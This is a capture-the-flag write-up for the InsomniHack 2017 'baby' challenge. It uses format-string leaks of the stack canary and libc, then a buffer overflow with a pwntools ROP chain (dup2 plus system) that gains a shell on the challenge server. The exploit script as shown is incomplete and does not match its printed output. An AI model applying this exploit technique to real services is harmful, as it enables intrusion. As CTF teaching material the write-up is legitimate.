# InsomniHack teaser 2k17: baby - pwn - 50 pts

Binary info

# file baby
baby: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, not stripped
# ./checksec.sh --file baby
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      FILE
Full RELRO      Canary found      NX enabled    PIE enabled     No RPATH   No RUNPATH   baby
# ./checksec.sh --file libc.so
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      FILE
Partial RELRO   Canary found      NX enabled    DSO             No RPATH   No RUNPATH   libc.so

Partial RELRO and Full RELRO

+ PLT --> GOT
known: GOT --> shared lib address
unknown: GOT --> PLT --> dynamic linker (lazy binding)

+ Partial RELRO (Relocation Read Only)

- read only after dynamic loader initialization: .init_array, .fini_array, .jcr .dynamic .got
- read-only: .got
- writeable: .got.plt

+ Full RELRO

- partial relro
- lazy binding disabled: imported symbols resolved at startup time.
- read-only: .got, .got.pl


(gdb) info signals SIGALRM
Signal        Stop Print Pass to program Description
SIGALRM       No No Yes  Alarm clock
(gdb) handle SIGALRM nopass
Signal        Stop Print Pass to program Description
SIGALRM       No No No  Alarm clock

__libc_start_main address range

(gdb) disassemble __libc_start_main

Find a __libc address

Your format > %158$llp

(gdb) x/3i 0x7ffff7a5c2b1
   0x7ffff7a5c2b1 <__libc_start_main+241>: mov    edi,eax
   0x7ffff7a5c2b3 <__libc_start_main+243>: call   0x7ffff7a71960 <__GI_exit>
   0x7ffff7a5c2b8 <__libc_start_main+248>: xor    eax,eax

Find libc base address

# objdump -M intel -d libc.so | grep -A 2 'mov    edi,eax'
   20830: 89 c7                 mov    edi,eax
   20832: e8 f9 97 01 00        call   3a030 <exit@@GLIBC_2.2.5>
   20837: 31 d2                 xor    edx,edx

Find cookie address

Your format > %138$llp

gdb config file

# cat .gdbinit
set follow-fork-mode child
handle SIGALRM nopass
set environment LD_PRELOAD=./libc.so
set disassembly-flavor intel


# cat baby.py
from pwn import *

host = 'baby.teaser.insomnihack.ch' # ''
port = 1337

def leak_address(pos):
    r.sendlineafter('> ', '2')
    r.sendlineafter('> ', pos)
    address = r.recvline()
    r.sendlineafter('> ', '')
    return address

def give_me_a_shell(payload):
    r.sendlineafter('> ', '1')
    r.sendlineafter('? ', str(len(payload) + 1))

context.arch = 'amd64'
print '[+] Arch = ' + context.arch

r = remote(host, port)

cookie = int(leak_address('%138$llp'), 16)
libc = int(leak_address('%158$llp'), 16)

elf = ELF('libc.so')
elf.address = libc - 0x20830
print '[+] libc base = ' + hex(elf.address)

padding = '\x90' * 1032
cookie = p64(cookie)
rbp = cookie
rop = ROP(elf)
rop.dup2(4, 0)
rop.dup2(4, 1)
rop.dup2(4, 2)
print '[+] rop\n' + rop.dump()

payload = padding + cookie + rbp + rop.chain()

# python baby.py
[+] Arch = amd64
[+] Opening connection to baby.teaser.insomnihack.ch on port 1337: Done
[*] 'libc.so'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[+] libc base = 0x7f129d29e000
[*] Loaded cached gadgets for 'libc.so'
[+] rop
0x0000:   0x7f129d2bf102 pop rdi; ret
0x0008:              0x4
0x0010:   0x7f129d2be2e8 pop rsi; ret
0x0018:              0x0
0x0020:   0x7f129d394d90 dup2
0x0028:   0x7f129d29e937 <adjust: ret>
0x0030:   0x7f129d2bf102 pop rdi; ret
0x0038:              0x4
0x0040:   0x7f129d2be2e8 pop rsi; ret
0x0048:              0x1
0x0050:   0x7f129d394d90 dup2
0x0058:   0x7f129d29e937 <adjust: ret>
0x0060:   0x7f129d2bf102 pop rdi; ret
0x0068:              0x4
0x0070:   0x7f129d2be2e8 pop rsi; ret
0x0078:              0x2
0x0080:   0x7f129d394d90 dup2
0x0088:   0x7f129d29e937 <adjust: ret>
0x0090:   0x7f129d2bf102 pop rdi; ret
0x0098:   0x7f129d42a177
0x00a0:   0x7f129d2e3390 system
0x00a8:       'raabsaab' <pad>
[*] Switching to interactive mode
Good luck !
$ cat flag

No comments: